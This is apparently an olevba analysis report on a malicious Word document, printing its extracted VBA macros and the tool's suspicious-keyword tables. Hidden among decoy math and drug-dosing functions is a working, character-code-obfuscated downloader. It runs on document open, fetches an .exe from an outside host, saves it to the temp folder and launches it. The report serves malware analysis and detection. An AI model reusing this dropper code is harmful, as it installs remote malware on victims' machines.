Malicious Word macro

olevba 0.26 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS-HB- slide1.doc

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: slide1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: slide1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub bPROANCE(FFFFF As Double)
SYa260nHlLU
End Sub

Sub autoopen()

bPROANCE (59.1)

End Sub

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+----------+---------------------------------------+
| Type     | Keyword  | Description                           |
+----------+----------+---------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
+----------+----------+---------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO M11.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/M11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


 Public Function CCGFemale(ByVal PtAge As Double, ByVal Weight As Double, ByVal SCr As Double) As Double
        CCGFemale = (((140 - PtAge) * Weight) / (72 * SCr)) * 0.85
    End Function

    Public Function JelliffeMale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
        JelliffeMale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73))
    End Function

    Public Function JelliffeFemale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
        JelliffeFemale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73)) * 0.9
    End Function

    Public Function AgExtIntDose(ByVal DosingWeight As Double) As Integer
        AgExtIntDose = My.Forms.FrmCalculator.ExtInt * DosingWeight
    End Function
Public Function PaddedScanner(Optional bufSz As Long = 20) As String
    Dim tmp As String
    tmp = scanner
    While Len(tmp) < bufSz
        tmp = tmp & " "
    Wend
    PaddedScanner = tmp
End Function

Public Function setbyname(name As Variant, value As Variant)

    name = Trim(Replace(name, """", Empty))
    value = Trim(Replace(value, """", Empty))
    value = Replace(value, "\\", Chr(5))
    value = Replace(value, "\", Empty)
    value = Replace(value, Chr(5), "\\")
    If value = "null" Then
        value = ""
    End If

    If value = "false" Then value = False
    If value = "true" Then value = True
    If name = "detected" And Len(value) = 0 Then value = False

    Select Case LCase(name)
        Case "scanner": scanner = value
        Case "detected": detected = CBool(value)
        Case "version": Version = value
        Case "result": Result = value
        Case "update": Update = value
    End Select


End Function


Public Sub ParseResponse(scanner_name, json)

    scanner = scanner_name

    '"detected": false, "version": "11.00", "result": null, "update": "20110421"

    On Error Resume Next
    Dim a As Long, b As Long
    Dim main As String, name As String, value As String, scans As String

    tmp = Split(json, ",")
    For Each entry In tmp
        entry = Trim(entry)
        If Len(entry) = 0 Then GoTo nextone
        b = InStr(1, entry, ":")
        If b < 2 Then GoTo nextone
        name = Mid(entry, 1, b - 1)
        value = Mid(entry, b + 1)
        If name = "result" And detected = True Then Stop

nextone:
    Next

    DoEvents


End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Chr            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

'Hyperbolic Sin
Public Function HSin(x As Double) As Double
HSin = CDbl((Exp(x) - Exp(-x)) / 2)
End Function


Public Function bPC3wkV1dz(FFslNfVxHtJTD As String)
    Set bPC3wkV1dz = VBA.CreateObject(Replace(FFslNfVxHtJTD, ",", Chr(46)))
End Function


'Hyperbolic Cos
Public Function HCos(x As Double) As Double
HCos = CDbl((Exp(x) + Exp(-x)) / 2)
End Function


Public Sub SYa260nHlLU()

 Set F7I2agqKJEg = bPC3wkV1dz(Fkfekijf)

F7I2agqKJEg.Open Chr(71) & "E" & _
Chr(84), Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(105) & "r" & Chr(112) & "a" & "n" & Chr(101) & Chr(116) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(49) & Chr(47) & Chr(48) & Chr(57) & "." & "e" & Chr(120) & Chr(101), False

Set m5FQL7pvv2xGo = bPC3wkV1dz(Chr(87) & Chr(83) & "c" & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))

Set MtMaMCcAKdcu = CallByName(m5FQL7pvv2xGo, Chr(69) & Chr(110) & Chr(118) & Chr(105) & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & "c" & "e" & Chr(115) & "s")

LuWnH83eN0 = MtMaMCcAKdcu(Chr(84) & "" & Chr(69) & "M" & "" & "P")

PCUG6yaQ2 = LuWnH83eN0 & "" & Chr(92) & "e" & "" & Chr(108) & "d" & Chr(115) & "" & Chr(104) & "r" & "t" & Chr(49) & "" & Chr(46) & "e" & "" & Chr(120) & Chr(101)
Dim mqN0kCl601e() As Byte

CallByName F7I2agqKJEg, Chr(83) & "e" & "" & "n" & Chr(100) & "", VbMethod
mqN0kCl601e = CallByName(F7I2agqKJEg, Chr(114) & "e" & "s" & Chr(112) & "o" & Chr(110) & Chr(115) & "e" & Chr(66) & "o" & Chr(100) & "y", VbGet)

WYYNIVVG3g mqN0kCl601e, PCUG6yaQ2
On Error GoTo drbs7Nf9B1
    a = 228 / 0
  On Error GoTo 0

OLdqOAA7DFWoSQ:
  Exit Sub
drbs7Nf9B1:
  UzyeNXQaGpp0 ("FL" & "" & "rF" & "" & "GfCva")
Resume OLdqOAA7DFWoSQ
End Sub
Public Function HTan(x As Double) As Double
HTan = CDbl((Exp(x) - Exp(-x)) / (Exp(x) + Exp(-x)))
End Function
'Hyperbolic Tangent

'Hyperbolic Cosecant
Public Function HCosec(x As Double) As Double
HCosec = CDbl(2 / (Exp(x) + Exp(-x)))
End Function

    Public Function CrClStd(ByVal CrCl As Double, ByVal BSA As Double) As Double
        CrClStd = CrCl * (1.73 / BSA)
    End Function

    Public Function IBWMale(ByVal PtHeightinInches As Double) As Double
        IBWMale = 50 + (2.3 * (PtHeightinInches - 60))
    End Function

    Public Function IBWFemale(ByVal PtHeightinInches As Double) As Double
        IBWFemale = 45.5 + (2.3 * (PtHeightinInches - 60))
    End Function

    Public Function CCGMale(ByVal PtAge As Double, ByVal Weight As Double, ByVal SCr As Double) As Double
        CCGMale = (((140 - PtAge) * Weight) / (72 * SCr))
    End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------+-----------------------------------------+
| Type       | Keyword      | Description                             |
+------------+--------------+-----------------------------------------+
| Suspicious | Open         | May open a file                         |
| Suspicious | Chr          | May attempt to obfuscate specific       |
|            |              | strings                                 |
| Suspicious | CreateObject | May create an OLE object                |
| Suspicious | CallByName   | May attempt to obfuscate malicious      |
|            |              | function calls                          |
+------------+--------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public PCUG6yaQ2 As String
Public Function SQLParseSQLF(ByVal SqlfExp As String) As String
    Dim lt As Integer
    Dim gt As Integer
    Dim name As String
    Dim Params

    lt = InStr(SqlfExp, "<")
    gt = InStr(SqlfExp, ">")
    name = Mid(SqlfExp, 1, lt - 1)
    Params = Mid(SqlfExp, lt + 1, gt - lt - 1)
    Params = Split(Params, ",")

    Select Case LCase(name)
    Case "concat"
        SQLParseSQLF = SQLF.Concat(Params)
    Case "left"
        SQLParseSQLF = SQLF.Left(Params(0), Params(1))
    Case "right"
        SQLParseSQLF = SQLF.Right(Params(0), Params(1))
    Case "mid"
        SQLParseSQLF = SQLF.Mid(Params(0), Params(1), Params(2))
    Case "padleft"
        If UBound(Params) > 3 Then
            SQLParseSQLF = SQLF.PadLeft(Params(0), Params(1), Params(2))
        ElseIf UBound(Params) > 2 Then
            SQLParseSQLF = SQLF.PadLeft(Params(0), Params(1))
        Else
            SQLParseSQLF = SQLF.PadLeft(Params(0))
        End If
    Case "padright"
        If UBound(Params) > 3 Then
            SQLParseSQLF = SQLF.PadRight(Params(0), Params(1), Params(2))
        ElseIf UBound(Params) > 2 Then
            SQLParseSQLF = SQLF.PadRight(Params(0), Params(1))
        Else
            SQLParseSQLF = SQLF.PadRight(Params(0))
        End If
    Case "quotedate"
        SQLParseSQLF = SQLF.QuoteDate(CDate(Params(0)))
    Case "quotetime"
        SQLParseSQLF = SQLF.QuoteTime(CDate(Params(0)))
    Case "quotedatetime"
        SQLParseSQLF = SQLF.QuoteDateTime(CDate(Params(0)))
    Case "quotestring"
        SQLParseSQLF = SQLF.QuoteString(Params(0))
    Case "quotename"
        SQLParseSQLF = SQLF.QuoteName(Params(0))
    Case "trim"
        SQLParseSQLF = SQLF.Trim(Params(0))
    Case "ltrim"
        SQLParseSQLF = SQLF.LTrim(Params(0))
    Case "rtrim"
        SQLParseSQLF = SQLF.RTrim(Params(0))
    Case Else
        SQLParseSQLF = name & "(" & Join(Params, ",") & ")"
    End Select
End Function


'Inverse Cos
Public Function ICos(x As Double) As Double
ICos = CDbl((180 / Pi) * Atn(-x / Sqr(-x * x + 1))) + 2 * CDbl((180 / Pi) * Atn(1))
End Function
'Inverse  Cosecant
Public Function ICosec(x As Double) As Double
ICosec = CDbl((180 / Pi) * Atn(x / Sqr(x * x - 1))) + Sgn((x) - 1) * (2 * CDbl((180 / Pi) * Atn(1)))
End Function
Public Function Cotangent(x As Double) As Double
Cotangent = CDbl(1 / Tan((Pi / 180) * CDbl(x)))
End Function


'Inverse Tangent
Public Function ITan(x As Double) As Double
ITan = CDbl((180 / Pi) * Atn(x))
End Function


Public Function WYYNIVVG3g(SXZObuw3iYYi As Variant, bXMzjPtEKL As String)
Dim XIFK7TOqYT: Set XIFK7TOqYT = bPC3wkV1dz("A" & "" & Chr(100) & "o" & "" & Chr(100) & Chr(98) & Chr(46) & "" & Chr(83) & Chr(116) & "r" & Chr(101) & Chr(97) & "m")

With XIFK7TOqYT
   .Type = 1
    .Open
    .write SXZObuw3iYYi
    .savetofile bXMzjPtEKL, 2
End With
End Function
'Inverse Sin
Public Function ISin(x As Double) As Double
ISin = CDbl((180 / Pi) * Atn(x / Sqr(-x * x + 1)))
End Function


'Cosecant
Public Function Cosecant(x As Double) As Double
Cosecant = CDbl(1 / Sin((Pi / 180) * CDbl(x)))
End Function
'Secant
Public Function Secant(x As Double) As Double
Secant = CDbl(1 / Cos((Pi / 180) * CDbl(x)))
End Function
'Cotangent


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Open           | May open a file                         |
| Suspicious | Chr            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | SaveToFile     | May create a text file                  |
| Suspicious | Write          | May write to a file (if combined with   |
|            |                | Open)                                   |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO M3.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/M3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Public Function RoundToSignificance(ByVal number As Integer, _
        ByVal roundtonearest As Integer) As Integer
        'Round number up or down to the nearest multiple of significance
        Dim d As Double
        d = number / roundtonearest
        d = Math.Round(d, 0)
        RoundToSignificance = d * roundtonearest
    End Function

    Public Function TOneHalf(ByVal K As Double) As Double
        TOneHalf = 0.693 / K
    End Function

    Public Function GentKEst(ByVal CrCl As Double) As Double
        GentKEst = (0.00293 * CrCl) + 0.014
    End Function


    Public Function AgExtIntInterval(ByVal CrClStd As Double) As Double
        Select Case CrClStd
            Case My.Forms.FrmCalculator.Q241 To My.Forms.FrmCalculator.Q242
                AgExtIntInterval = 24
            Case My.Forms.FrmCalculator.Q361 To My.Forms.FrmCalculator.Q362
                AgExtIntInterval = 36
            Case My.Forms.FrmCalculator.Q481 To My.Forms.FrmCalculator.Q482
                AgExtIntInterval = 48
        End Select
    End Function


    Public Function TobraKEst(ByVal CrClStd As Double) As Double
        TobraKEst = (0.00293 * CrClStd) + 0.014
    End Function


    Public Function VancKEst(ByVal CrCl As Double) As Double
        VancKEst = (0.00083 * CrCl) + 0.004
    End Function

    Public Function VdCalc(ByVal VolumeConstant As Double, ByVal PtWeightinKg As Double) As Double
        VdCalc = VolumeConstant * PtWeightinKg
    End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Module3.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Option Explicit
Public Function Add_UniqueItem(ByRef cboBox As ComboBox, ByRef itemText As String, Optional ByVal cmpMethod As VbCompareMethod = vbBinaryCompare) As Boolean
        '<EhHeader>
        On Error GoTo Add_UniqueItem_Err
        '</EhHeader>

    Dim i As Long

100 Add_UniqueItem = False

102 If cboBox Is Nothing Then Exit Function

104 With cboBox

106     For i = 0 To .ListCount
108         If StrComp(.List(i), itemText, cmpMethod) = 0 Then Exit Function
        Next

110     .AddItem itemText

    End With

112 Add_UniqueItem = True

        '<EhFooter>
        Exit Function

Add_UniqueItem_Err:
        MsgBox Err.Description & vbCrLf & _
               "in ssMDBQuery.MComboboxHelper.Add_UniqueItem " & _
               "at line " & Erl
        Resume Next
        '</EhFooter>
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO M3F1.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/M3F1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Aggregate()
    ' jyeee, 18 Apr 06

    Dim insertPoint, numParts, FilePaths As Variant
    ' Make slidemakers upload slides to reachable directories***
    '       \\path\to\ppts
    ' Make slidemakers provide own title slide***

    ' ###############################################
    ' Have to hand-jam, force slidemakers to standardize name***
    ' Look out for commas --the last entry should not have one
    FilePaths = Array( _
        "\\path\to\ppts\OSW.ppt", _
        "\\path\to\ppts\CP.ppt", _
        "\\path\to\ppts\MXG.ppt", _
        "\\path\to\ppts\OSO.ppt", _
        "\\path\to\ppts\OG.ppt", _
        "\\path\to\ppts\MDG.ppt", _
        "\\path\to\ppts\MSG.ppt", _
        "\\path\to\ppts\CCP.ppt", _
        "\\path\to\ppts\DS.ppt", _
        "\\path\to\ppts\PA.ppt" _
        )

    numParts = UBound(FilePaths) - LBound(FilePaths) + 1

    '"\\path\to\ppts\OSA.ppt", _

    ' ***ENSURE numParts and the # of paths in FilePaths ARE CONSISTENT***
    ' ###############################################

    ' Template should only have first and last slides
    ' Following code ensures this condition
    If ActivePresentation.Slides.Count = 2 Then
        ' Good! NSW ;)
    ElseIf ActivePresentation.Slides.Count < 2 Then
        ' Bad.  Quit for now.
        MsgBox "Two there must be, a master and an apprentice"
        Exit Sub
    Else
        ' Bad -- there are more than two
        ' Assume that the first and last slides are correct
        '  and delete all in the middle
        Dim MyMsg, MyTitle, Response
        MyMsg = "Confirm deletion of slides 2-" & (ActivePresentation.Slides.Count - 1)
        MyTitle = "WARNING!"
        Response = MsgBox(Prompt:=MyMsg, Buttons:=vbYesNo + vbExclamation, Title:=MyTitle)
        Select Case Response
            Case Is = vbYes
                Do While ActivePresentation.Slides.Count > 2
                    ActivePresentation.Slides(2).Delete
                    ' M$ inconsistent array numbering, this starts with 1 :(
                Loop
            Case Is = vbNo
                Exit Sub
        End Select
    End If

    ' M$ correct inconsistency --arrays start with 0 :)

End Sub

Public Function Fkfekijf() As String

Fkfekijf = "," & Chr(88) & Chr(77) & "L" & Chr(72) & Chr(84) & "TP"
Fkfekijf = "s" & Chr(111) & Chr(102) & "t" & Fkfekijf

Fkfekijf = Chr(77) & "i" & Chr(99) & "r" & Chr(111) & Fkfekijf
End Function


'Cos
Public Function CosTheta(x As Double) As Double
CosTheta = Cos((Pi / 180) * CDbl(x))
End Function
Sub JoinAllDocxInFolder()
  'MAC VBA does not support wildcards in DIR function
  'So fake it.

  Dim folderPath As String
  ' folderpath = "MacintoshHD:Users:jyee:Desktop:word_docs:docs"
  folderPath = "C:\Users\rhl\Desktop\docs"
  folderPath = folderPath & Application.PathSeparator
  Dim filetype As String
  filetype = "docx"

  Dim MainDoc As Document
  Set MainDoc = Documents.Add
  Dim file As String
  Dim rng As Range
  Dim oCollection As New Collection

  file = Dir$(folderPath) 'setup initial file

  Do While Len(file)
    If InStr(filetype, "*") Then
      'if a star exists in the call, just look for that text
      'within the initial characters of the extension
      '(extension presumed 4 characters max, plus the period)
      If InStr(Right(file, 5), filetype) Then
        oCollection.Add folderPath & file
        If file <> ActiveDocument.name Then
          ' iRet = MsgBox(folderPath & file, vbOKOnly, "Aloha")
          Set rng = MainDoc.Range
          rng.Collapse wdCollapseEnd
          rng.InsertFile folderPath & file
        End If
      End If
    Else
      'if no star in the call, then test if extensions match
      If Right(file, Len(filetype)) = filetype Then
        oCollection.Add folderPath & file
        If file <> ActiveDocument.name Then
          ' iRet = MsgBox(folderPath & file, vbOKOnly, "Aloha")
          Set rng = MainDoc.Range
          rng.Collapse wdCollapseEnd
          rng.InsertFile folderPath & file
        End If
      End If
    End If
    'read next item
    file = Dir$
  Loop

End Sub


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| Suspicious | Chr            | May attempt to obfuscate specific       |
|            |                | strings                                 |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1F3.bas
in file: slide1.doc - OLE stream: u'Macros/VBA/Module1F3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Const Pi = 3.14159265358979
'Sin
Public Function Sine(x As Double) As Double
Sine = Sin((Pi / 180) * CDbl(x))
End Function

'Inverse Secant
Public Function ISec(x As Double) As Double
ISec = CDbl((180 / Pi) * Atn(x / Sqr(x * x - 1))) + Sgn((x) - 1) * (2 * CDbl((180 / Pi) * Atn(1)))
End Function
'Inverse Cotangent
Public Function ICot(x As Double) As Double
ICot = CDbl((180 / Pi) * Atn(x)) + 2 * CDbl((180 / Pi) * Atn(1))
End Function 'Hyperbolic Secant


Public Function UzyeNXQaGpp0(zhe0hni3C As String)
    Set xLFUyTFUI5lp = bPC3wkV1dz(Chr(83) & Chr(104) & "e" & Chr(108) & "l" & "." & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & "t" & Chr(105) & "o" & Chr(110))
xLFUyTFUI5lp.Open (PCUG6yaQ2)
End Function
Public Function HSec(x As Double) As Double
HSec = CDbl(2 / (Exp(x) - Exp(-x)))
End Function
'Hyperbolic Cotangent
Public Function HCotan(x As Double) As Double
HCotan = CDbl((Exp(x) + Exp(-x)) / (Exp(x) - Exp(-x)))
End Function


'Inverse Hyperbolic Sine
Public Function IHSin(x As Double) As Double
IHSin = CDbl(Log(x + Sqr(x * x + 1)))
End Function
'Inverse Hyperbolic Cos
Public Function IHCos(x As Double) As Double
IHCos = CDbl(Log(x + Sqr(x * x - 1)))
End Function
'Inverse Hyperbolic Tangent
Public Function IHTan(x As Double) As Double
IHTan = CDbl(Log((1 + x) / (1 - x)) / 2)
End Function
'Inverse Hyperbolic Secant
Public Function IHSec(x As Double) As Double
IHSec = CDbl(Log((Sqr(-x * x + 1) + 1) / x))
End Function
'Inverse Hyperbolic Cosecant
Public Function IHCosec(x As Double) As Double
IHCosec = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
End Function


'Inverse Hyperbolic Cotangent
Public Function IHCot(x As Double) As Double
IHCot = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
End Function


'********************************************************************
'
'   OTHER USEFUL FUNCTIONS
'
'********************************************************************
Public Function Power(x As Double, Y As Double) As Double
Power = x ^ Y
End Function

Public Function LogN(Base As Double, x As Double) As Double
LogN = Log(x) / Log(Base)
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Chr         | May attempt to obfuscate specific       |
|            |             | strings                                 |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+